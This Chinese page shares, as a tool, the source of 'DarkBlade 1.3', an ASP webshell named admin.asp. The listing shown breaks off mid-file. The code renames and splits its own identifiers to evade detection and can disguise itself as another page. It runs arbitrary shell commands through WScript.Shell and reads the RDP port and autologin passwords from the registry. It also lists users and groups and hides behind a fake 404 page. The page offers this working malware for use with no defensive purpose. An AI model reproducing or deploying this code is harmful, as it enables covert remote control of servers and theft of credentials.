用户工具

站点工具


工具分享:iis权限重分配跨目录程序
admin.asp
<%@ LANGUAGE='VBScript' CODEPAGE='65001'%>
<%
	Response.Buffer=True
	Response.CharSet="utf-8"
	Server.ScriptTimeOut=300
 
	'-------------------------------Config-------------------------------
	'Private version, do not share it to anybody!
	'DarkBlade 1.3 by B100d5w0rd, msn:[email protected]
	'Final version, no more update
	'Thanks to these hackers:Bin, Luyu, Sht
 
	Const pass="109707CB7C10970CCA81ACE832947C"	'tencentisapieceofshit
	Const needEncode=True
	Const encodeNum=20
	Const isDebugMode=False
	Const encodeCut="_"
	Const pamtoEncode="thePath|cmdPath|cmdStr|connStr|queryStr|regPath|pubPam|txtObjInfo|StrTable|mdbPath|searchkey|suUser|suPass|suPath|suCmd|targetUrl|portList|dicList|ipList|destName|loadpath"
	Const showLogin="login"
	Const defaultChr="GB2312"
	Const aspExt="asp|asa|cer|cdx"
	Const textExt="asp|asa|cer|cdx|aspx|asax|ascx|cs|jsp|php|txt|inc|ini|js|htm|html|xml|config"
	Const sqlPageSize=50
	Const fToPre="zzzzzzzz.html"
	Const bOtherUser=True		'
	'-------------------------------Config-------------------------------
 
 
 
	'-------------------Transform sign------------------
	Const transformSign="'-------------------Transform sign------------------"
	Const notToTransform="upload|action|file|password|text|server|title|user|login|value|port|filename|name|htmlEnc|type|http|pass|files|path|attributes|goaction|info|download|logout|login|content|charset|font|color|size|value|width|rows|class|name|value|width|size|color|save|down|span|echo|form|byval|find|vbcrlf"
	Const strs_toTransform="command|Radmin|NTAuThenabled|FilterIp|IISSample|PageCounter|PermissionChecker|BrowserType|ContentRotator|SystemRoot|ComSpec|PATHEXT|PROCESSOR|ARCHITECTURE|IDENTIfIER|REVISION|Physical|Memory|Installed|NUMBER_OF_PROCESSORS|PROCESSOR_ARCHITECTURE|Os2LibPath|NameServer|DefaultGateway|HKEY|HKLM|LOCAL_MACHINE|SOFTWARE|CurrentVersion|Winlogon|CurrentControlSet|ControlSet001|WinStations|RDP-Tcp|PROCESSOR_IDENTIfIER|PROCESSOR_LEVEL|PROCESSOR_REVISION|Windows NT|AutoAdminLogon|DefaultUserName|DefaultPassword|ComputerName|DisplayLastUserName|anonymous|LanmanServer|AutoShareServer|EnableSharedNetDrives|EnableSecurityFilters|Engines|SandBoxMode|openrowSet|sp_oacreate|sp_oamethod|sp_oasetproperty|net user|PasswordExpired|Scripting.|.FileSystemObject|Shell.|.Application|WScript.|.Shell|.Stream|Adodb.|.Connection|.RecordSet|MSXML2.|.XMLHTTP|SoftArtisans.|.FileUp|.FileManager|Persits.|MSWC.|xplog70|addextEndedproc|master|cmdShell|regwrite|system32|SetDOMAIN|TZOEnable|43958|Serv-U|SetUSERSetUP|LoginMesFile|RelPaths|DELETEDOMAIN|MAINTENANCE|Maintenance|HomeDirDrive|NeedSecure|HideHidden|AlwaysAllowLogin|ChangePassword|QuotaEnable|SpeedLimitUp|SpeedLimitDown|MaxNrUsers|IdleTimeOut|RWAMELCDP|upadmin|LocalAdministrator|13709620|444553540000|72C24DD5|98424B88AFB8|Server.Execute|Eval|localgroup|MaxUsersLoginPerIP|Server.Execute|ShellExecute|Terminal|Unauthorized|DarkBladePass|AuThenticate|AUTH_USER|WinDir|ExecuteGlobal|sp_addsrvrolemember"
	Const funcs_toTransform="SavetoFile|CopyFile|OpenTextFile|CreateTextFile|DeleteFile|GetParentFolder|GetExtension|CreateFolder|MoveFolder|GetFileName|CopyFolder|MoveFile|DeleteFolder|NameSpace|Environment|ExpandEnvironmentStrings|RegRead|Exec|Run|GetSystemInformation|Save|CopyHere|MoveHere|ReadAll|DriveLetter|DateCreated|LastModIfied|LastAccessed|Filesystem|TotalSize|PasswordMinimumLength|AccountDisabled|IsAccountLocked|AccountExpirationDate|LoadFromFile"
	Dim currentPath,tmpPath,objCountFile,tempFileData,splitArray,strArray_toTransform,str_transformed,varArray_forbidden,funcArray_toTransform,total,arr_notToTransform,var_toTransform_list,strArr_toTransform,funcArr_toTransform,regex,filetopretEnd,nopretEnd,strForbidden
	strForbidden="dim|sub|end|for|and|now|get|Set|chr|int|day|int|rnd|not|len|mid|sun|asc|cos|app|xor|imp|fix|atn|err|rgb|else|const|true|false|call|each|then|next|redim|error|null|empty|until|loop|case|step|log|dir|stop|str"
	Set regex=new RegExp
	regex.Global=True
	regex.IgnoreCase=True
	regex.MultiLine=True
	arr_notToTransform=Split(notToTransform,"|")
 
	funcArr_toTransform=Split(funcs_toTransform,"|")
	var_toTransform_list=""
	strArr_toTransform=Split(strs_toTransform,"|")
	strUbound=UBound(strArr_toTransform)
	filetopretEnd=request("filetopretEnd")
	nopretEnd=request("nopretEnd")
	serveren=request("serveren")
	Call transinit()
	Sub transinit()
		If filetopretEnd=""And nopretEnd=""Then
			Call userInit()
			response.End
		Else
		Call Transform()
		End If
		Response.Redirect"?goaction=login"
	End Sub
	Sub userInit()
		Dim fsoX,theFolder
		Set fsoX=CreateObj("Scripting.FileSystemObject")
		Set theFolder=fsoX.GetFolder(mapath("."))
		echo"<form method=post>"
		echo"Running first time,choose the file to pretEnd as."
		echo"<select name=""filetopretEnd"">"
		For Each subFile In theFolder.Files
			If(Lcase(Right(subFile.Name,3))="asp"Or Lcase(Right(subFile.Name,3))="asa")And subFile.Name<>getRight(getServerVariable("PATH_INFO"),"/") Then echo"<option value="""&subFile.Name&""">"&subFile.Name&"</option>"
		Next
		echo"</select>"
		echo"<input type=checkbox name=nopretEnd value=1>No pretEnding<br>"
		echo"Server Encode:<input type=text name=serveren value='GB2312'><br>"
		echo"<input type=submit value="" OK "">"
		echo"</form>"
	End Sub
	Sub Transform()
		Dim fsoX,crlf
		crlf=Chr(13)&Chr(10)
		currentPath=mapath(getCurrentFileName(request.ServerVariables("URL")))
		tempFileData=readSelf(currentPath)
		splitArray=Split(tempFileData,transformSign)
		If nopretEnd=""Then nopretEnd=0
		tempFileData=Replace(splitArray(0)&splitArray(3),"encodeNum=20","encodeNum="&getRndNum(20,81))
		If nopretEnd<>1 And filetopretEnd<>""Then tempFileData=Replace(tempFileData,"zzzzzzzz.html",filetopretEnd)
		If serveren<>""Then tempFileData=Replace(tempFileData,"GB2312",serveren)
		tempFileData=Replace(tempFileData,Chr(9),"")
		tempFileData=Replace(tempFileData,crlf&crlf,crlf)
		tempFileData=Replace(tempFileData,crlf&crlf,crlf)
		do_varTransform()
		do_strTransform()
		do_funcTransform()
		saveSelf currentPath,tempFileData
	End Sub
 
	Function readSelf(thePath)
		Set fsoX=CreateObj("Scripting.FileSystemObject")
		Set objCountFile=fsoX.OpenTextFile(thePath,1,True)
		readSelf=objCountFile.ReadAll
		objCountFile.Close
		Set objCountFile=Nothing
	End Function
	Sub saveSelf(thePath,fileContent)
		Set fsoX=CreateObj("Scripting.FileSystemObject")
		Set objCountFile=fsoX.CreateTextFile(thePath,True)
		objCountFile.Write tempFileData
		objCountFile.Close
		Set objCountFile=Nothing
	End Sub
 
	Sub do_varTransform
 
		'Sub/Function Transform
		Dim matchColl,arr_varToTransform,matchArr
		regex.Pattern="(sub|function) +[\w]+(?= *\()"
		regex.Global=True
		regex.IgnoreCase=True
		regex.MultiLine=True
		Set matchColl=regex.Execute(tempFileData)
		For Each matched In matchColl
			matched=regRep(matched,"(sub|function) +","",False)
			addToVarArr matched
		Next
		For Each tmpVar_toTramsform In Split(var_toTransform_list,"|")
			do_varReplace tmpVar_toTramsform,0
		Next
		var_toTransform_list=""
		'Var Transform
		regex.Pattern="dim +[\w ,]+"
		Set matchColl=regex.Execute(tempFileData)
		For Each matched In matchColl
			matched=Lcase(matched)
			matched=Trim(Replace(Lcase(matched),"dim ",""))
			For Each varToTransform In Split(matched,",")
				addToVarArr varToTransform
			Next
		Next
		regex.Pattern="const\s+[\w]+(?=\s*=)"
		Set matchColl=regex.execute(tempFileData)
		For Each matched In matchColl
			matched=Replace(Lcase(matched),"const","")
			matched=Trim(Replace(Lcase(matched),"set",""))
			addToVarArr matched
		Next
		'Parameter Transform
		regex.Pattern="(function|sub)\s+[\w]+\([\w,]+"
		Set matchColl=regex.execute(tempFileData)
		For Each matched In matchColl
			matched=getRight(Lcase(matched),"(")
			For Each subPam In Split(matched,",")
				If InStr(subPam," ")>0 Then subPam=getRight(subPam," ")
				addToVarArr Trim(subPam)
			Next
		Next
		regex.Pattern="case\s*""[^\r\n]+"""
		Set matchColl=regex.execute(tempFileData)
		For Each matched In matchColl
			matched=regRep(matched,"case\s*""","",False)
			matched=Replace(matched,"""","")
			If InStr(matched,",")>0 Then
				For Each subMacthed In Split(matched,",")
					addToVarArr Trim(subMacthed)
				Next
			Else
				addToVarArr matched
			End If
		Next
		For Each tmpVar_toTramsform In Split(var_toTransform_list,"|")
			do_varReplace tmpVar_toTramsform,3
		Next
		var_toTransform_list=""
 
	End Sub
	Sub do_varReplace(varToTransform,intType)
		If varToTransform=""Then Exit Sub
		Dim varTransformed,strPattern
		varTransformed=getRndStr()
		strForbidden=strForbidden&"|"&Lcase(varTransformed)
		varToTransform=Replace(varToTransform,".","\.")
		Select Case intType
			Case 0
				strPattern="([^\w\\])"&varToTransform&"(?![\w\\])"
				tempFileData=regRep(tempFileData,strPattern,"$1"&varTransformed,False)
			Case Else
				strPattern="([^\w\\])"&varToTransform&"(?![\w\\])"
				tempFileData=regRep(tempFileData,strPattern,"$1"&varTransformed,False)
		End Select
	End Sub
	Sub do_strTransform()
		For Each str_toTransform In strArr_toTransform
			do_strReplace str_toTransform
		Next
	End Sub
	Sub do_strReplace(str)
		If str=""Then Exit Sub
		Dim rndNum,str_transformed,strPattern
		rndNum=getRndNum(2,Len(str)-3)
		str_transformed=Left(str,rndNum)&"""&"&getRndStr()&"&"""&Right(str,Len(str)-rndNum)
		strPattern="\b"&Replace(Replace(str,".","\."),"_","\_")&"\b"
		echo strPattern&"<br>"
		tempFileData=regRep(tempFileData,strPattern,str_transformed,False)
	End Sub
	Sub do_funcTransform
		Dim tmpFunc,matchColl,matched
		regex.Global=True
		regex.IgnoreCase=True
		regex.MultiLine=True
		For Each tmpFunc In funcArr_toTransform
			regex.Pattern="[^\n\r]+\."&tmpFunc&"\b[^\n\r]+"
			Set matchColl=regex.Execute(tempFileData)
			For Each matched In matchColl
				do_funcReplace matched,tmpFunc
			Next
		Next
	End Sub
	Sub do_funcReplace(strLine,func_toTransform)
		If func_toTransform=""Or strLine=""Then Exit Sub
		Dim tmpFunc,func_transformed,rndStr,rndNum,line_transformed
		If Left(Lcase(strLine),3)="if "Or Left(Lcase(strLine),4)="for "Then Exit Sub
		rndStr=getRndStr()
		rndNum=getRndNum(1,Len(func_toTransform)-1)
		func_transformed=Left(func_toTransform,rndNum)&"""&"&rndStr&"&"""&Right(func_toTransform,Len(func_toTransform)-rndNum)
		regex.Global=True
		regex.IgnoreCase=True
		regex.MultiLine=True
		regex.Pattern="""[^&]*\b"&func_toTransform&"\b[^&]*"""
		If Left(line_transformed,8)="execute " Or regex.test(strLine)Then
			line_transformed=Replace(strLine,func_toTransform,func_transformed,1,-1,1)
		Else
			line_transformed=Replace(strLine,"""","""""")
			line_transformed=Replace(line_transformed,func_toTransform,func_transformed,1,-1,1)
			line_transformed="execute """&line_transformed&""""
		End If
		tempFileData=Replace(tempFileData,strLine,line_transformed)
	End Sub
 
	Sub addToVarArr(str)
		If Not isTransAble(str)Then Exit Sub
		If InStr(var_toTransform_list,"|"&str)>0 Or InStr(var_toTransform_list,str&"|")>0 Then Exit Sub
		If var_toTransform_list=""Then
			var_toTransform_list=str
		Else
			var_toTransform_list=var_toTransform_list&"|"&str
		End If
	End Sub
	Function isTransAble(str)
		If Len(str)<4 Then
			isTransAble=False
			Exit Function
		End If
		For Each strNotTransform In arr_notToTransform
			If strNotTransform=Lcase(str)Then
				isTransAble=False
				Exit Function
			End If
		Next
		isTransAble=True
	End Function
	Function getCurrentFileName(url)
		getCurrentFileName=Right(url,Len(url)-InStrrev(url,"/"))
	End Function
	Function getRndStr()
		Dim rndStr
		rndStr=""
		Do While not chkRndStr(rndStr)
			rndStr=""
			For i=1 To getRndNum(3,3)
				rndStr=rndStr&getRndChar()
			Next
		Loop
		getRndStr=rndStr
	End Function
	Function chkRndStr(Str)
		Str=Lcase(str)
		If Left(Str,1)="h"Or Len(str)<3 Then
			chkRndStr=False
			Exit Function
		End If
		If InStr(strForbidden,"|"&Str)>0 Or InStr(strForbidden,Str&"|")>0 Then
			chkRndStr=False
			Exit Function
		End If
		chkRndStr=true
	End Function
	Function getRndChar()
		Dim SYMBOL_Char:SYMBOL_Char="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
		Randomize
		getRndChar=Mid(SYMBOL_Char,getRndNum(1,52),1)
	End Function
	Function getRndNum(a,b)
		Randomize
		getRndNum=Int(b * rnd+a)
	End Function
 
	Function regRep(str,strPattern,replaced,needFormat)
		If needFormat Then
			strPattern=Replace(strPattern,"\","\\")
			strPattern=Replace(strPattern,".","\.")
			strPattern=Replace(strPattern,"?","\?")
			strPattern=Replace(strPattern,"+","\+")
			strPattern=Replace(strPattern,"(","\(")
			strPattern=Replace(strPattern,")","\)")
			strPattern=Replace(strPattern,"*","\*")
			strPattern=Replace(strPattern,"[","\[")
			strPattern=Replace(strPattern,"]","\]")
		End If
		regex.Pattern=strPattern
		regRep=regex.Replace(str,replaced)
	End Function
 
	'-------------------Transform sign------------------
 
	Dim goaction,thePath,cmdStr,connStr,regPath,pubPam,serverName,objXml,objWs,objFso,objSa,objStream,objRe,pagePath,pageName,startTime,EndTime,aspPath,rootPath,errMsg,txtObjInfo,trId,SessionKey,SessionValue,cmdPath,formId,subAct,truePath,localName,strFileMethod,fileContent,newOneName,newOneType,dbType,conn,strTable,intPage,mdbName,dbname,packMethod,mdbName2,mdbPath,searchkey,useReg,suUser,suPass,suPort,suPath,suCmd,deldomain,newdomain,newuser,suquit,loginuser,loginpass,mt,targetUrl,ipList,portList,dicList,outPath,outExt,cmdDoTExeFiLe,userPass,queryStr,sversion,cookiePre,cookiePass,strObj,strReplaceTo,needReplace,searchExt,getInc,chkPath,needecho,datem,strRefFile,fsoAttrib,logged,shellenv,nuser,npass,nport,cls_upload,destName,loadPath,strfrm,sqlver,moveme
	sversion="DarkBlade 1.3 Private"
	cookiePre="DarkBlade"
	cookiePass="DarkBladePass"
	doInit()
	logged=isIn()
	If logged Then
		pamInit()
	Else
		goaction=request("goaction")
	End If
	If Not logged And goaction<>showLogin Then show404()
	If bOtherUser And Trim(getServerVariable("AUTH_USER"))="" Then
		Response.Status="401 Unauthorized"
		Response.Addheader"WWW-AuThenticate","BASIC"
		If getServerVariable("AUTH_USER")=""Then Response.End()
	End If
	Select Case goaction
		Case showLogin
			pageLogin()
		Case"objOnSrv"
			PageObjOnSrv()
		Case"userList"
			PageUserList()
		Case"CSInfo"
			PageCSInfo()
		Case"WsCmdRun"
			PageWsCmdRun()
		Case"infoAboutSrv"
			PageInfoAboutSrv()
		Case"MsDataBase"
			PageMsDataBase()
		Case"OtherTools"
			PageOtherTools()
		Case"TxtSearcher"
			PageTxtSearcher()
		Case"ServUp"
			PageServUp()
		Case"ScanShell"
			PageScan()
		Case"Logout"
			PagedoLogout()
		Case"AddToMdb"
			PageAddToMdb()
		Case"SaFileExplorer","FsoFileExplorer"
			PageFileExplorer()
		Case Else
			PageFileExplorer()
	End Select
	doFin
 
	Sub doInit()
		If Not isDebugMode Then On Error Resume Next
		startTime=Timer()
		Dim formContent,queryContent,upformContent,Sessions,Session_Array,sescontent,strTodecode,pamArrtoEncode
		servurl=getServerVariable("URL")
		Set objXml=CreateObj("MSXML2.XMLHTTP")
		Set objWs=CreateObj("WScript.Shell")
		Set objFso=CreateObj("Scripting.FileSystemObject")
		Set objSa=CreateObj("Shell.Application")
		If Not IsObject(objWs)Then Set objWs=CreateObj("WScript.Shell.1")
		If Not IsObject(objSa)Then Set objSa=CreateObj("Shell.Application.1")
		Set objRe=new RegExp
		objRe.Global=True
		objRe.IgnoreCase=True
		objRe.MultiLine=True
		serverName=getServerVariable("SERVER_NAME")
		pagePath=getServerVariable("PATH_INFO")
		pageName=Lcase(getRight(pagePath,"/"))
		aspPath=mapath(".")
		rootPath=mapath("/")
		formId=1
		trId=1
	End Sub
	Sub pamInit()
		For Each queryContent In request.queryString
			execute queryContent&"=request.queryString("""&queryContent&""")"
		Next
		For Each formContent In request.Form
			execute formContent&"=request.form("""&formContent&""")"
		Next
		If InStr(getServerVariable("CONTENT_TYPE"),"multipart/form-data")=1 Then
			Set cls_upload=new upload_5xsoft
			For Each upformContent In cls_upload.objForm
				execute upformContent&"=cls_upload.objForm("""&upformContent&""")"
			Next
		End If
		pamArrtoEncode=Split(pamtoEncode,"|")
		For Each strTodecode In pamArrtoEncode
			execute""&strTodecode&"=secretDecode("&strTodecode&")"
		Next
		If Right(thePath,1)="\"And Len(thePath)>3 Then thePath=Left(thePath,Len(thePath)-1)
	End Sub
	Sub doFin()
		If Not isDebugMode Then On Error Resume Next
		Dim timeProcessed
		objXml.abort
		Set objXml=Nothing
		Set objWs=Nothing
		Set objFso=Nothing
		Set objSa=Nothing
		Set objRe=Nothing
		EndTime=timer()
		timeProcessed=EndTime-startTime
		echo"<br></div>"
		doTable"100%"
		echo"<tr class=""head"">"
		echo"<td>"
		echoLine errMsg
		timeProcessed=FormatNumber(timeProcessed,5)
		If Left(timeProcessed,1)="."Then timeProcessed="0"&timeProcessed
		echoLine"<br>"
		echo"<div align=right>Processed in :"&timeProcessed&"seconds</div></td></tr></table></body></html>"
		Response.End()
	End Sub
 
	Sub pageLogin()
		If Not isDebugMode Then On Error Resume Next
		userPass=request("userPass")
		If userPass<>""Then
			userPass=CFSEncode(userPass)
			If CFSEncode(userPass)=pass Then
				Response.Cookies(cookiePass)=userPass
				Response.Redirect(pagePath)
			Else
				errMsgAdd"Fuck you,get out!"
			End If
		End If
		showTitle"Login"
		echo"<center><br>"
		doForm False
		echo"<b>Password : </b>"
		doInput"password","userPass","","30",""
		echo" "
		doSubmit"Get In"
		echo"</center></form>"
	End Sub
 
	Sub PageInfoAboutSrv()
		If Not isDebugMode Then On Error Resume Next
		Dim i,objWshSysEnv,aryExEnvList,strExEnvList,intCpuNum,strCpuInfo,strOS,terminalPortPath,terminalPortKey,termPort
		strExEnvList="SystemRoot|WinDir|ComSpec|TEMP|TMP|NUMBER_OF_PROCESSORS|OS|Os2LibPath|Path|PATHEXT|PROCESSOR_ARCHITECTURE|"&_
					"PROCESSOR_IDENTIfIER|PROCESSOR_LEVEL|PROCESSOR_REVISION"
		aryExEnvList=Split(strExEnvList,"|")
		Set objWshSysEnv=objWs.Environment("SYSTEM")
		intCpuNum=getServerVariable("NUMBER_OF_PROCESSORS")
		If IsNull(intCpuNum)Or intCpuNum=""Then
			intCpuNum=objWshSysEnv("NUMBER_OF_PROCESSORS")
		End If
		strOS=getServerVariable("OS")
		If IsNull(strOS)Or strOS=""Then
			strOS=objWshSysEnv("OS")
			strOs=strOs&"(probably Windows 2003)"
		End If
		strCpuInfo=objWshSysEnv("PROCESSOR_IDENTIfIER")
		showTitle"Server Infomation"
		doTable"100%"
		doTh
		echo"<td colspan=""2""align=""center"">"
		echo"<b>Server parameters:</b>"
		echo"</td>"
		doTtr
		doTr 0
		doTd"Server name:",""
		doTd serverName,""
		doTtr
		doTr 1
		doTd"Server IP:",""
		doTd getServerVariable("LOCAL_ADDR"),""
		doTtr
		doTr 0
		doTd"Server port:",""
		doTd getServerVariable("SERVER_PORT"),""
		doTtr
		doTr 1
		doTd"Server memory",""
		doTd getTheSize(objSa.GetSystemInformation("PhysicalMemoryInstalled")),""
		doTtr
		doTr 0
		doTd"Server time",""
		doTd Now,""
		doTtr
		doTr 1
		doTd"Server soft",""
		doTd getServerVariable("SERVER_SOFTWARE"),""
		doTtr
		doTr 0
		doTd"Script timeout",""
		doTd Server.ScriptTimeout,""
		doTtr
		doTr 1
		doTd"Number of cpus",""
		doTd intCpuNum,""
		doTtr
		doTr 0
		doTd"Info of cpus",""
		doTd strCpuInfo,""
		doTtr
		doTr 1
		doTd"Server OS",""
		doTd strOS,""
		doTtr
		doTr 0
		doTd"Server script engine",""
		doTd ScriptEngine&"/"&ScriptEngineMajorVersion&"."&ScriptEngineMinorVersion&"."&ScriptEngineBuildVersion,""
		doTtr
		doTr 1
		doTd"File full path",""
		doTd getServerVariable("PATH_TRANSLATED"),""
		doTtr
		trId=0
		For i=0 To UBound(aryExEnvList)
			doTr trId
			doTd aryExEnvList(i)&":",""
			doTd objWs.ExpandEnvironmentStrings("%"&aryExEnvList(i)&"%"),""
			doTtr
			trIdAdd
		Next
		doTtable
		chkerr(Err)
		echo"<br>"
		Set objWshSysEnv=Nothing
		Dim objTheDrive
		doTable"100%"
		doTh
		echo"<td colspan=""6""align=""center"">"
		echo"<b>Info of disks</b>"
		echo"</td>"
		doTtr
		doTr 0
		doTd"Driver letter",""
		doTd"Type",""
		doTd"Label",""
		doTd"File system",""
		doTd"Space left",""
		doTd"Total space",""
		doTtr
		trId=1
		For Each objTheDrive In objFso.Drives
			Dim dLetter,dType,vName,fSystem,fSpace,tSize
			dLetter=objTheDrive.DriveLetter
			If Lcase(dLetter)<>"a"Then
				dType=getDriveType(objTheDrive.DriveType)
				vName=objTheDrive.VolumeName
				fSystem=objTheDrive.Filesystem
				fSpace=getTheSize(objTheDrive.FreeSpace)
				tSize=getTheSize(objTheDrive.TotalSize)
				doTr trId
				doTd dLetter,""
				doTd dType,""
				doTd vName,""
				doTd fSystem,""
				doTd fSpace,""
				doTd tSize,""
				doTtr
			End If
			dLetter=""
			dType=""
			vName=""
			fSystem=""
			fSpace=""
			tSize=""
			trIdAdd
		Next
		doTtable
		chkerr(Err)
		Set objTheDrive=Nothing
		Dim objTheFolder
		Set objTheFolder=objFso.GetFolder(rootPath)
		echo"<br>"
		doTable"100%"
		doTh
		echo"<td colspan=""2""align=""center"">"
		echo"<b>Info of site:</b>"
		echo"</td>"
		doTtr
		doTr 0
		doTd"Physical path:",""
		doTd rootPath,""
		doTtr
		doTr 1
		doTd"Current size:",""
		doTd getTheSize(objTheFolder.Size),""
		doTtr
		doTr 0
		doTd"File count:",""
		doTd objTheFolder.Files.Count,""
		doTtr
		doTr 1
		doTd"Folder count:",""
		doTd objTheFolder.SubFolders.Count,""
		doTtr
		doTtable
		chkerr(Err)
		echoLine"<br>"
		Dim autoLoginPath,autoLoginUserKey,autoLoginPassKey
		Dim isAutoLoginEnable,autoLoginEnableKey,autoLoginUsername,autoLoginPassword
		terminalPortPath="HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\"
		terminalPortKey="PortNumber"
		termPort=ReadReg(terminalPortPath&terminalPortKey)
		If termPort=""Then termPort="Can't get terminal port.<br/>"
		autoLoginPath="HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\"
		autoLoginEnableKey="AutoAdminLogon"
		autoLoginUserKey="DefaultUserName"
		autoLoginPassKey="DefaultPassword"
		isAutoLoginEnable=ReadReg(autoLoginPath&autoLoginEnableKey)
		If isAutoLoginEnable=0 Then
			autoLoginUsername="Autologin isn't enabled"
		Else
			autoLoginUsername=ReadReg(autoLoginPath&autoLoginUserKey)
		End If
		If isAutoLoginEnable=0 Then
			autoLoginPassword="Autologin isn't enabled"
		Else
			autoLoginPassword=ReadReg(autoLoginPath&autoLoginPassKey)
		End If
		doTable"100%"
		doTh
		echo"<td colspan=""2""align=""center"">"
		echo"<b>Info of Terminal port&Autologin</b>"
		echo"</td>"
		doTtr
		doTr 0
		doTd"Terminal port:",""
		doTd termPort,""
		doTtr
		doTr 1
		doTd"Autologin account:",""
		doTd autoLoginUsername,""
		doTtr
		doTr 0
		doTd"Autologin password:",""
		doTd autoLoginPassword,""
		doTtr
		doTtable
		echo"</ol>"
		chkerr(Err)
	End Sub
 
	Sub PageObjOnSrv()
		Dim i,objTmp,strObjectList,strDscList
 
		strObjectList="MSWC.AdRotator,MSWC.BrowserType,MSWC.NextLink,MSWC.TOOLS,MSWC.Status,MSWC.Counters,IISSample.ContentRotator,IISSample.PageCounter,MSWC.PermissionChecker,Adodb.Connection,SoftArtisans.FileUp,SoftArtisans.FileManager,LyfUpload.UploadFile,Persits.Upload.1,W3.Upload,JMail.SmtpMail,CDONTS.NewMail,Persits.Mailsender,SMTPsvg.Mailer,DkQmail.Qmail,Geocel.Mailer,IISmail.Iismail.1,SmtpMail.SmtpMail.1,SoftArtisans.ImageGen,W3Image.Image,Scripting.FileSystemObject,Adodb.Stream,Shell.Application,Shell.Application.1,WScript.Shell,WScript.Shell.1,WScript.Network,hzhost.modules"
		strDscList="Ad Rotator,Browser info,NextLink,,,Counters,Content rotator,,Permission checker,ADODB connection,SA-FileUp,SoftArtisans FileManager,LyfUpload,ASPUpload,Dimac upload,Dimac JMail,CDONTS SMTP mail,ASPemail,ASPmail,dkQmail,Geocel mail,IISmail,SmtpMail,SoftArtisans ImageGen,Dimac W3Image,FSO,Stream ,,,,,,Hzhost module"
 
		aryObjectList=Split(strObjectList,",")
		aryDscList=Split(strDscList,",")
		showTitle"Server Object Probe"
		echo"Check for other ObjectId or ClassId.<br>"
		doForm True
		doInput"text","txtObjInfo",txtObjInfo,50,""
		echo" "
		doSubmit"Check"
		doFform
		If txtObjInfo<>""Then
			doUl
			Call getObjInfo(txtObjInfo,"")
			echo"</ul>"
		End If
		echo"<hr/>"
		echo"<ul class=""info""><li><u>Object name</u>Status and more</li>"
 
		For i=0 To UBound(aryDscList)
			Call getObjInfo(aryObjectList(i),aryDscList(i))
		Next
 
		echo"</ul><hr/>"
	End Sub
 
	Sub PageUserList()
		Dim objUser,objGroup,objComputer
 
		showTitle"Users and Groups Imformation"
		Set objComputer=getObj("WinNT://.")
		objComputer.Filter=Array("User")
		doShowHideMe"User",False
		doTable"100%"
		For Each objUser in objComputer
			doTh
			echo"<td colSpan=""2""align=""center""><b>"&objUser.Name&"</b></td>"
			doTtr
			showUserInfo(objUser.Name)
		Next
		doTtable
		echo"</span><br>"
		chkerr(Err)
		doShowHideMe"UserGroup",False
		objComputer.Filter=Array("Group")
		doTable"100%"
		trId=1
		For Each objGroup in objComputer
			doTr trId
			doTd objGroup.Name,""
			doTd objGroup.Description,""
			doTtr
			trIdAdd
		Next
		doTtable
		echo"</span>"
		chkerr(Err)
	End Sub
 
	Sub PageCSInfo()
		If Not isDebugMode Then On Error Resume Next
		Dim strKey,strVar,strVariable,SessionContent
		If SessionKey<>""Then Session(SessionKey)=SessionValue
		showTitle"Server-Client Information"
		doShowHideMe"ServerVariables",True
		doTable"100%"
		trId=1
		For Each strVariable In Request.ServerVariables
			doTr trId
			doTdNoWrap strVariable
			doTd getServerVariable(strVariable),""
			doTtr
			trIdAdd
		Next
		doTtable
		echoLine"</span><br>"
		doShowHideMe"Application",True
		doTable"100%"
		trId=1
		For Each strVariable In Application.Contents
			doTr trId
			doTdNoWrap strVariable
			doTd htmlEnc(Application(strVariable)),""
			doTtr
			trIdAdd
		Next
		doTtable
		echoLine"</span><br>"
		doShowHideMe"Session",True
		echo"<br>(ID"&Session.SessionId&")"
		doTable"100%"
		trId=1
		For Each strVariable In Session.Contents
			SessionContent=Session(strVariable)
			doTr trId
			doTdNoWrap strVariable
			doTd htmlEnc(SessionContent),""
			doTtr
			trIdAdd
		Next
		doTr trId
		doForm False
		doTdSubmit"Set Session","20%"
		echo"<td width=""80%""> Key :"
		doInput"text","SessionKey","",30,""
		echo"Value :"
		doInput"text","SessionValue","",30,""
 
		echo"</td>"
		doFform
		doTtr
		doTtable
		echoLine"</span><br>"
		doShowHideMe"Cookies",True
		doTable"100%"
		trId=1
		For Each strVariable In Request.Cookies
			If Request.Cookies(strVariable).HasKeys Then
				For Each strKey In Request.Cookies(strVariable)
					doTr trId
					doTdNoWrap strVariable&"("&strKey&")"
					doTd htmlEnc(Request.Cookies(strVariable)(strKey)),""
					doTtr
					trIdAdd
				Next
			Else
				doTr trId
				doTdNoWrap strVariable
				doTd htmlEnc(Request.Cookies(strVariable)),""
				doTtr
				trIdAdd
			End If
		Next
		doTtable
		echo"</span>"
		chkerr(Err)
	End Sub
 
	Sub PageWsCmdRun()
		Dim CmdResult,tmpcmdstr
		If Not isDebugMode Then On Error Resume Next
		showTitle("WScript.Shell Execute")
		If cmdPath<>""Then
			If InStr(Lcase(cmdPath),"cmd.exe")>0 And InStr(cmdStr,"/c ")<1 Then
				tmpcmdstr=cmdPath&" /c "&cmdStr
			Else
				tmpcmdstr=cmdPath&" "&cmdStr
			End If
			If needecho=1 Then
				CmdResult=objWs.Exec(tmpcmdstr).StdOut.ReadAll()
			Else
				objWs.Run tmpcmdstr,0,False
			End If
			chkerr(Err)
		Else
			cmdPath="cmd.exe"
		End If
		doTable"100%"
		doForm True
		doTr 1
		doTd"Path","20%"
		doTdInput"text","cmdPath",cmdPath,"60%","",""
		echo"<td>"
		doChkBox"needecho",1," View result ","checked"
		doSubmit"Run"
		echo"</td>"
		doTtr
		doTr 0
		doTd"Parameters",""
		doTdInput"text","cmdStr",cmdStr,"","","2"
		doTtr
		doFform
		doTtable
		echo"<hr><b>Result:</b><br><span class=""alt1Span"">"&htmlEnc(CmdResult)&"</span>"
		chkerr(Err)
	End Sub
 
	Sub PageFileExplorer()
		If Not isDebugMode Then On Error Resume Next
		If thePath=""Then thePath=pubPam
		If thePath=""Then thePath=aspPath
		If goaction<>"SaFileExplorer"Then goaction="FsoFileExplorer"
		If subAct="down"Then
			DownTheFile()
			Response.End()
		End If
		If goaction="FsoFileExplorer"Then
			strFileMethod="fso"
			showTitle("FSO File Explorer")
		Else
			strFileMethod="sa"
			showTitle("APP File Explorer")
		End If
